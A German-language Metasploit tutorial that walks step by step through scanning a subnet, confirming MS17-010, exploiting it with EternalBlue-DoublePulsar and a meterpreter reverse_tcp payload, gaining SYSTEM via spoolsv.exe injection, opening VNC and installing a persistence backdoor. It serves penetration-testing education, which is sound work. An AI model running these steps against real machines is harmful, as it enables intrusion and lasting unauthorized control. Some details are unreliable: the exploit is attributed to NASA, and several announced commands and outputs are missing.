Wir haben die TOP 25 BEST KALI LINUX TOOL besprochen und METASPLOIT an die erste Stelle der Liste gesetzt, nun wollen wir über METASPLOIT diskutieren und lernen. Wir empfehlen Ihnen, mit Metasploit vertraut zu sein.
Metasploit wurde ursprünglich von H. D Moore im Jahr 2003 entwickelt, bis es am 21. Oktober 2009 von Rapid7 übernommen und weiterentwickelt wurde. Das Metasploit-Framework wurde vollständig in Ruby geschrieben und ist ein Standardpaket, das in Kali Linux (und wohl auch in fast allen anderen Betriebssystemen für Penetrationstests) installiert ist. Es ist ein beliebtes Kit für Hacker und Penetrationstester, um Sicherheitslücken zu erforschen, Exploits zu entwickeln und auszuführen und andere Sicherheitsentwicklungen vorzunehmen.
Metasploit gibt es in verschiedenen Editionen, die im Allgemeinen in zwei Kategorien unterteilt sind: die kostenlose Version und die kostenpflichtige Version. Die kostenlosen Versionen: Metasploit Framework Community Edition (CLI-basierte Schnittstelle) und Armitage (GUI-basierte Schnittstelle). Die kostenpflichtigen Versionen: Metasploit Express, Metasploit Pro und Cobalt Strike (ähnlich wie Armitage, das von Strategic Cyber LLC bereitgestellt wird).
Metasploit ermöglicht es Benutzern, ihren eigenen Exploit-Code zu erstellen (oder zu entwickeln), aber keine Sorge, wenn Sie nicht wissen, wie man programmiert, Metasploit hat so viele Module und sie werden ständig aktualisiert. Derzeit hat Metasploit über 1600 Exploits und 500 Nutzlasten. Um zu verstehen, was Exploits und Nutzlasten sind, muss man wissen, wie der Angreifer die Nutzlast durch die Sicherheitslücke des Zielsystems einschleust. Sobald der Angreifer den Exploit, der eine Nutzlast enthält, auf das verwundbare Zielsystem loslässt, wird die Nutzlast bereitgestellt (die Nutzlast wird verwendet, um eine Verbindung zum Angreifer herzustellen, um Fernzugriff auf das Zielsystem zu erlangen); in diesem Stadium ist der Exploit abgeschlossen und wird irrelevant.
„Metasploit ist kein Instant-Hacking-Tool, es ist ein wahnsinniges Framework“
In diesem Metasploit-Artikel geht es um die Durchführung von Penetrationstests gegen ein Zielsystem unter Verwendung des folgenden Ablaufs:
- Schwachstellen-Scanning
- Schwachstellen-Bewertung
- Exploiting
- Remote-Zugriff erhalten – das System besitzen
VORBEREITUNG
Stellen Sie sicher, dass unser Kali Linux die neueste aktualisierte Version hat. In jedem Update gibt es Verbesserungen. Führen Sie die folgenden Befehle aus:
~# apt upgrade -y
~# apt dist-upgrade -y
Wenn unser Rechner auf dem neuesten Stand ist, können wir damit beginnen, die Metasploit-Konsole zu starten. Geben Sie im Terminal ein:
Und außerdem benötigen Sie einen beliebigen Texteditor, Gedit oder Leafpad, um einige Informationen zu sammeln, bevor wir den Angriff kompilieren. Zunächst ermitteln Sie die IP-Adresse der drahtlosen Schnittstelle, die IP-Adresse des Routers und die Netzmaske.
Auf der Grundlage der oben genannten Informationen notieren wir die IP-Adresse von WLAN1 und Router sowie die Netzmaske. Die Notiz sollte also wie folgt aussehen:
Angreifer-IP (LHOST): 192.168.1.56
Gateway / Router-IP: 192.168.1.1
Netzmaske: 255.255.255.0(/24)
STEP 1 : VULNERABILITY SCANNING
In der Metasploit-Konsole sammeln wir dann zunächst Informationen wie die IP-Adresse des Ziels, das Betriebssystem, die geöffneten Ports und die Schwachstelle. Metasploit ermöglicht es uns, NMap direkt von der Konsole aus auszuführen. Basierend auf den oben genannten Informationen führen Sie diesen Befehl aus, um unsere Aufgabe der Informationssammlung zu erfüllen.
msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O
Aus dem obigen Befehl erhalten wir das folgende Ergebnis.
Wir haben ein verwundbares Ziel mit Windows-Betriebssystem, und die Verwundbarkeit ist auf SMBv1-Dienst. So, add to note.
Target IP (RHOST): 192.168.1.57
Schwachstelle: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
STEP 2 : VULNERABILITY ASSESSMENT
Nun kennen wir das Ziel und seine Schwachstelle. Lasst uns die Schwachstelle in der Metasploit-Konsole überprüfen
Jetzt kennen wir das Ziel und seine Schwachstelle. Lassen Sie uns die Schwachstelle in der Metasploit-Konsole mit dem Hilfsmodul smb_scanner überprüfen. Führen Sie den folgenden Befehl aus:
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run
Metasploit ist sich der Schwachstelle sicher und zeigt die genaue Windows OS Edition an. Zu beachten:
Ziel-OS: Windows 7 Ultimate 7600
STEP 3 : EXPLOITING
Unglücklicherweise hat metasploit kein Exploit-Modul für diese Schwachstelle. Aber keine Sorge, es gibt jemanden, der diese Schwachstelle aufgedeckt und den Exploit-Code geschrieben hat. Der Exploit ist bekannt, da er von der NASA initiiert wurde, und heißt EternalBlue-DoublePulsar. Sie können ihn hier herunterladen, oder Sie können der Anleitung aus dem Tutorial-Video unten folgen, um den Exploit-Code in Ihrem Metasploit-Framework zu installieren.
Wenn Sie der obigen Anleitung gefolgt sind (stellen Sie sicher, dass der Pfad der gleiche ist wie im Tutorial). Jetzt sind Sie bereit, das Ziel zu nutzen. Führen Sie die folgenden Befehle aus:
Setzen Sie payload windows/meterpreter/reverse_tcp
Setzen Sie PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56
Exploit
Boom… Der Exploit war erfolgreich, wir haben eine Meterpreter-Sitzung. Wie ich bereits erwähnt habe, wird der Exploit, sobald er gestartet ist, die Nutzlast bereitstellen, die in diesem Fall windows/meterpreter/reverse_tcp ist.
STEP 4 : ERHALTUNG DES FERNZUGRIFFS
Lassen Sie uns die weiteren verfügbaren Befehle erkunden, geben Sie ‚?‘ (ohne Fragezeichen) ein und sehen Sie die Liste der verfügbaren Befehle. Die Stdapi, Systembefehle sind:
Um mehr Informationen über das Zielsystem zu erhalten, verwenden Sie den Befehl ’sysinfo‘. Die Ausgabe sollte wie folgt aussehen:
Da wir vorhin in den Systemprozess (spoolsv.exe) injiziert haben, haben wir Systemprivileg. Wir besitzen das Ziel. Wir können viel mit dem Befehl an das Ziel tun. Zum Beispiel könnten wir RDP ausführen oder einfach VNC remote einstellen. Um den VNC-Dienst zu starten, geben Sie folgenden Befehl ein:
Das Ergebnis sollte der Desktop des Zielcomputers sein, der wie folgt aussieht:
Das Wichtigste ist, eine Backdoor zu erstellen, so dass der Zielcomputer immer dann, wenn die Verbindung zu unserem Computer getrennt wird, versucht, sich wieder mit uns zu verbinden. Backdooring wird verwendet, um den Zugang aufrechtzuerhalten, es ist wie beim Angeln, man wirft den Fisch nicht zurück ins Wasser, wenn man ihn gefangen hat, richtig? Sie wollen etwas mit dem Fisch machen, sei es, ihn im Kühlschrank aufzubewahren, um ihn zu kochen oder für Geld zu verkaufen.
Meterpreter verfügt über diese dauerhafte Backdooring-Funktion. Führen Sie den folgenden Befehl aus, und werfen Sie einen Blick auf die verfügbaren Parameter und Argumente.
meterpreter > run persistence -h
Wenn Sie sich mit diesem veralteten Skript nicht anfreunden können, finden Sie das neueste Persistenzmodul unter post/windows/manage/persistence_exe. Sie können es selbst weiter erforschen.
Metasploit ist riesig, es ist nicht nur ein Tool, es ist ein Framework, man bedenke, dass es über 1600 Exploits und etwa 500 Payloads hat. Ein Artikel ist nur für das große Bild der allgemeinen Verwendung oder Idee geeignet. Aber Sie haben so viel aus diesem Artikel gelernt.
„Je mehr Sie dem Angriffsfluss folgen, desto mehr haben Sie eine mühelose Herausforderung.“